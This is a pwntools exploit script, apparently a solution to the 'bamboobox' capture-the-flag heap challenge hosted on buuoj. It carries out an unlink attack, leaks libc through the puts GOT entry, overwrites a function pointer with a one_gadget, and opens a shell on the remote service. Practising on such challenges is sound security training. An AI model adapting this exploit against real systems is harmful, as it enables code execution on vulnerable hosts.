from pwn import *
context.arch = "amd64"
context.log_level = "debug"
# p = process("./bamboobox")
p = remote("node5.buuoj.cn", 26684)
elf = ELF("./bamboobox")
libc = ELF("./libc-2.23.so")
def add(length, name):
p.sendlineafter(b"Your choice:", b"2")
p.sendlineafter(b"Please enter the length of item name:", str(length).encode())
p.sendlineafter(b"Please enter the name of item:", name)
def delete(idx):
p.sendlineafter(b"Your choice:", b"4")
p.sendlineafter(b"Please enter the index of item:", str(idx).encode())
def show():
p.sendlineafter(b"Your choice:", b"1")
def edit(idx, size, content):
p.sendlineafter(b"Your choice:", b"3")
p.sendlineafter(b"Please enter the index of item:", str(idx).encode())
p.sendlineafter(b"Please enter the length of item name:", str(size).encode())
p.sendlineafter(b"Please enter the new name of the item:", content)
add(0x80, b"chunk0")
add(0x80, b'chunk1')
add(0xf0, b'chunk2')
add(0x80, b'chunk3')
edit(1, 0x90, p64(0) + p64(0x80) + p64(0x6020d8-0x18) + p64(0x6020d8-0x10) + b'a' * 0x60 + p64(0x80) + p64(0x100))
delete(2)
show()
edit(1, 0x20, p64(0x10)+ p64(elf.got["puts"]))
show()
p.recvuntil(b"0 : ")
leak = u64(p.recv(6).ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"]
# log.info("leak: " + hex(leak))
log.info("libc: " + hex(libc.address))
onegadget = 0x45216
edit(0, 0x10, p64(libc.address + onegadget))
# gdb.attach(p)
p.interactive()
浙公网安备 33010602011771号